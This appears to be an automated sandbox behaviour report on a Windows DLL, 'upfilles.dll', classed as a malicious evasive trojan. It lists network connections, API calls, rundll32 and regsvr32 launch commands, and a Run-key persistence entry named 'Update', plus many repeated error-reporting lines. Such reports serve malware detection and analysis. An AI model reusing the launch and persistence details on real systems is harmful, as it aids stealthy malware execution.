Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: unknown | Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown | Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown | Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown | Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown | Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown | Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown | Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown | Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown | Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown | Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown | HTTPS traffic detected: 91.194.11.183:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 138.124.183.215:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 54.175.181.104:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 95.164.68.73:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.155:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800012B0 NtConnectPort,NtRequestWaitReplyPort,NtRequestPort,
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180001490 NtCreateSection,LocalAlloc,LocalAlloc,NtConnectPort,NtRequestWaitReplyPort,
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180001650 RtlInitUnicodeString,NtClose,NtClose,RtlNtStatusToDosError,SetLastError,LocalFree,LocalFree,LocalFree,LocalFree,
Source: C:\Windows\System32\rundll32.exe | Code function: 18_3_000002921300D31C NtProtectVirtualMemory,
Source: C:\Windows\System32\rundll32.exe | Code function: 18_3_000002921300D2AC NtAllocateVirtualMemory,
Source: C:\Windows\explorer.exe | Code function: 22_2_013A6814 NtFreeVirtualMemory,
Source: C:\Windows\explorer.exe | Code function: 22_2_013A958C NtAllocateVirtualMemory,
Source: C:\Windows\explorer.exe | Code function: 22_2_013AA5CC NtDelayExecution,
Source: C:\Windows\explorer.exe | Code function: 22_2_013A6728 NtWriteFile,
Source: C:\Windows\explorer.exe | Code function: 22_2_013A6618 RtlInitUnicodeString,NtCreateFile,
Source: C:\Windows\explorer.exe | Code function: 22_2_013A650C RtlInitUnicodeString,NtCreateFile,NtClose,
Source: C:\Windows\explorer.exe | Code function: 22_2_013A6464 RtlInitUnicodeString,NtOpenFile,NtClose,
Source: C:\Windows\explorer.exe | Code function: 22_2_013A67A0 NtClose,
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018001C030
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018000A040
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800190AC
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180001950
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018000B992
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800131E0
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018000E200
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018000B210
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800192B8
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180020B88
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180004C00
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180013448
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018001C45C
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018000C480
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018001EC90
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800154A0
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180023584
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800176FC
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000292116E254C
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000000026E7DFB4C
Source: C:\Windows\explorer.exe | Code function: 22_2_013A1030
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6324 -s 344
Source: upfilles.dll.dll | Binary or memory string: OriginalFilenameeppcom64.dllZ vs upfilles.dll.dll
Source: classification engine | Classification label: mal100.troj.evad.winDLL@32/17@8/6
Source: C:\Windows\System32\rundll32.exe | Code function: 18_3_00007DF4F0240000 CreateToolhelp32Snapshot,Process32First,Process32Next,
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018000AEB0 CoCreateInstance,
Source: C:\Windows\System32\rundll32.exe | Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7272
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7288
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6636:120:WilError_03
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6324
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6516
Source: C:\Windows\System32\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\ba1d38a4-2e70-4cdd-8ce4-6f972928d4e8
Source: upfilles.dll.dll | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll64.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
Source: upfilles.dll.dll | ReversingLabs: Detection: 15%
Source: unknown | Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\upfilles.dll.dll"
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllCanUnloadNow
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllGetClassObject
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6324 -s 344
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllInstall
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6516 -s 344
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllCanUnloadNow
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllGetClassObject
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllInstall
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllUnregisterServer
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",stow
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7272 -s 344
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7288 -s 344
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllCanUnloadNow
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllGetClassObject
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllInstall
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllCanUnloadNow
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllGetClassObject
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllInstall
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllUnregisterServer
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",stow
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow
Source: C:\Windows\System32\loaddll64.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\loaddll64.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Windows\System32\rundll32.exe | Automated click: OK
Source: C:\Windows\System32\rundll32.exe | Automated click: OK
Source: C:\Windows\System32\rundll32.exe | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: upfilles.dll.dll | Static PE information: Image base 0x180000000 > 0x60000000
Source: upfilles.dll.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: upfilles.dll.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: upfilles.dll.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: upfilles.dll.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: upfilles.dll.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: upfilles.dll.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: upfilles.dll.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: X:\Gitlab\Builds\e945be61\0\lab\protectionplatform\Output\Release\x64\eppcom64.pdb source: rundll32.exe, 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1803925725.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.1853230060.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1842561236.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000012.00000002.2936902948.0000000180025000.00000002.00000001.01000000.00000003.sdmp, upfilles.dll.dll
Source: upfilles.dll.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: upfilles.dll.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: upfilles.dll.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: upfilles.dll.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: upfilles.dll.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: upfilles.dll.dll | Static PE information: real checksum: 0x491bb should be: 0x85fc5
Source: upfilles.dll.dll | Static PE information: section name: hVr
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180006138 push E8000020h; iretd
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000292116A5BB0 push r15; ret
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000000026E7A31B0 push r15; ret
Source: C:\Windows\System32\rundll32.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update
Source: C:\Windows\System32\rundll32.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180023584 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
